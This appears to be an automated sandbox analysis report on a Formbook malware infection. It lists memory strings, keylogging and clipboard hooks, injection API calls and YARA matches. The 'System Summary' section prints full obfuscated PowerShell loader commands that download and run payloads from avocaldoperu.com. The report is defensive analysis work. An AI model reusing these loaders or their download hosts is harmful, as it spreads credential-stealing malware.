2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E5A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://avocaldoperu.com
              Source: wscript.exe, 0000000F.00000002.2253941242.000000000078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2252846292.0000000000780000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 0000000F.00000002.2253941242.000000000078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2252846292.0000000000780000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enH
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp(
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpX
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpg
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpn.net/json.gp
              Source: powershell.exe, 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe | String found in binary or memory: http://www.ebuddy.com
              Source: wab.exe | String found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000011.00000002.2266923406.0000000002FB4000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
              Source: wab.exe | String found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBdq
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://avocaldoperu.com
              Source: wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avocaldoperu.com/
              Source: wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4243548599.0000000023800000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avocaldoperu.com/Jouse1.png
              Source: wab.exe, 0000000A.00000002.4243548599.0000000023800000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://avocaldoperu.com/Jouse1.pngamalsAffavocaldoperuone.com/Jouse1.png
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://avocaldoperu.com/Jouse4.png
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://avocaldoperuone.com/Jouse4.png
              Source: powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5DA03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
              Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&f
              Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: wab.exe, 00000011.00000003.2266618350.0000000003719000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2267743806.0000000003719000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
              Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exe | String found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exe | String found in binary or memory: https://www.google.com
              Source: wab.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknown | HTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49737 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0041183A OpenClipboard,GetLastError,DeleteFileW,17_2_0041183A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,17_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,18_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,19_2_004072B5

              E-Banking Fraud

              Source: Yara match | File source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

              System Summary

              Source: amsi32_7860.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_8084.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: 0000001E.00000002.4222881972.0000000003F90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001A.00000002.2858446917.00000000229A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001A.00000002.2858446917.00000000233A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001E.00000002.4222881972.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7860, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 4336
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 4360
              Source: C:\Windows\SysWOW64\wscript.exe | Process created: Commandline size = 4400
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 4400
              Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. 
,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process Stats: CPU usage > 49%
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_00401806 NtdllDefWindowProc_W,17_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_004018C0 NtdllDefWindowProc_W,17_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_004016FD NtdllDefWindowProc_A,18_2_004016FD
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_004017B7 NtdllDefWindowProc_A,18_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_00402CAC NtdllDefWindowProc_A,19_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_00402D66 NtdllDefWindowProc_A,19_2_00402D66
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC35C0 NtCreateMutant,LdrInitializeThunk,26_2_21CC35C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2B60 NtClose,LdrInitializeThunk,26_2_21CC2B60
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2DF0 NtQuerySystemInformation,LdrInitializeThunk,26_2_21CC2DF0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2C70 NtFreeVirtualMemory,LdrInitializeThunk,26_2_21CC2C70
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC3090 NtSetValueKey,26_2_21CC3090
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC3010 NtOpenDirectoryObject,26_2_21CC3010
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC4340 NtSetContextThread,26_2_21CC4340
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC4650 NtSuspendThread,26_2_21CC4650
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC39B0 NtGetContextThread,26_2_21CC39B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2BE0 NtQueryValueKey,26_2_21CC2BE0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2BF0 NtAllocateVirtualMemory,26_2_21CC2BF0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2B80 NtQueryInformationFile,26_2_21CC2B80
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2BA0 NtEnumerateValueKey,26_2_21CC2BA0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2AD0 NtReadFile,26_2_21CC2AD0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2AF0 NtWriteFile,26_2_21CC2AF0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2AB0 NtWaitForSingleObject,26_2_21CC2AB0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2DD0 NtDelayExecution,26_2_21CC2DD0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2DB0 NtEnumerateKey,26_2_21CC2DB0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC3D70 NtOpenThread,26_2_21CC3D70
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2D00 NtSetInformationFile,26_2_21CC2D00
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC3D10 NtOpenProcessToken,26_2_21CC3D10
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2D10 NtMapViewOfSection,26_2_21CC2D10
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2D30 NtUnmapViewOfSection,26_2_21CC2D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2CC0 NtQueryVirtualMemory,26_2_21CC2CC0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2CF0 NtOpenProcess,26_2_21CC2CF0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2CA0 NtQueryInformationToken,26_2_21CC2CA0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2C60 NtCreateKey,26_2_21CC2C60
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2C00 NtQueryInformationProcess,26_2_21CC2C00
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2FE0 NtCreateFile,26_2_21CC2FE0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2F90 NtProtectVirtualMemory,26_2_21CC2F90
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2FA0 NtQuerySection,26_2_21CC2FA0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2FB0 NtResumeThread,26_2_21CC2FB0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2F60 NtCreateProcessEx,26_2_21CC2F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2F30 NtCreateSection,26_2_21CC2F30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 26_2_21CC2EE0 NtQueueApcThread,26_2_21CC2EE0
